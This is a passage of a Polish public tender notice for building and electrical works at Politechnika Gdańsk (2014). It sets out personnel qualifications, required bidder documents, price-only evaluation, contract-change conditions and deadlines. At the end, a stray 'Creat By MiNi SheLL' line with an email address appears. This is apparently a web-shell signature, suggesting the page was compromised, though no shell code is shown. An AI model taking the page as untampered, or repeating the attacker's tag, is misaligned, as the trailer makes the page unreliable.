</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonania zamówienia, posiadającą doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostaną jej powierzone tj.:
a)	osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach 
b)	osobą, która będzie pełnić funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach 
	UWAGA:	
	Zamawiający, określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity: Dz. U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt. III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy  przed terminem składania ofert</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru wykonawcy, dotyczących:
a.	terminu
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia jednej z niżej wymienionej okoliczności pod warunkiem, że ma ona wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
- przestojów i opóźnień zawinionych przez Zamawiającego,
- działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne),
- wstrzymania robót przez Zamawiającego
- konieczności oczekiwania na wprowadzenie przez projektanta korekt i uściśleń 
w rozwiązaniach projektowych,
- ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody 
w budynku,
- opóźnień spowodowanych niemożliwością prowadzenia robót w sposób ciągły                                 w pomieszczeniach , które nie mogą być wyłączone z eksploatacji, 
- ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód prawnych, formalnych lub technologicznych,
- realizacji robót dodatkowych, zamiennych lub zaniechania części robót. 
W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia  terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości. 
b. 	zakresu i wartości umowy
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane. 
Wprowadzenie robót zamiennych jest możliwe jeśli:
- jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy, 
- stało się konieczne na skutek ujawnienia się błędów w dokumentacji projektowej, lub przeszkód         w budynku, 
- pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych                       w  dokumentacji projektowej,
- dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych                 w momencie zawarcia umowy.
Realizacja robót zamiennych w stosunku do określonych w umowie, musi być wywołana czynnikami obiektywnymi związanymi z tą realizacją tj. niezależnymi od wykonawcy, związanymi z koniecznością wprowadzenia zmian warunkujących realizację prac zgodnie ze sztuką budowlaną, nie powodującymi rozszerzenia przedmiotu zamówienia określonego w dokumentacji projektowej ani wynagrodzenia wykonawcy. 
Wprowadzenie robót zaniechanych jest możliwe jeśli:
- są one następstwem zleconych robót dodatkowych
- konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy
-zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży                     w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy. 
Wartość robót zaniechanych zostanie ustalona na podstawie cen z kosztorysu ofertowego Wykonawcy.
c.  		zmiany stawki VAT
Wynagrodzenie Wykonawcy może ulec zmianie w przypadku obniżenia lub podwyższenia stawki podatku VAT na skutek zmiany obowiązujących przepisów. 
Płatność będzie się odbywać z uwzględnieniem stawki VAT obowiązującej w dniu wystawienia faktury.
d.  zmiany w składzie osób uczestniczących w wykonywaniu zamówienia 
Wykonawca może dokonywać zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującą nową osobę.  
W przypadku zmiany osoba, która będzie uczestniczyć w wykonywaniu zamówienia, musi posiadać  kwalifikacje i doświadczenie, jakie posiadają osoby wskazane w ofercie. 
Wykonawca musi z własnej inicjatywy zaproponować zastępstwo w przypadku śmierci, choroby lub wypadku lub innej przyczyny wyłączającej możliwość pracy któregokolwiek z osób. 
Zamawiający może żądać zmiany, jeżeli w jego opinii osoba ta jest nieefektywna lub nie wywiązuje się z obowiązków wynikających z Umowy.

e.    zmiany lub rezygnacji z Podwykonawcy
Wykonawca może dokonać zmiany lub zrezygnować z Podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków
udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest zobowiązany wykazać
Zamawiającemu, iż proponowany inny Podwykonawca (lub Wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Obowiązek wykazania powyższych okoliczności w sposób nie budzący wątpliwości Zamawiającemu spoczywa na Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki , ul. Narutowicza 11/12, 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2014 godzina 09:45, miejsce: Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki , ul. Narutowicza 11/12, 80-233 Gdańsk, pok. 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com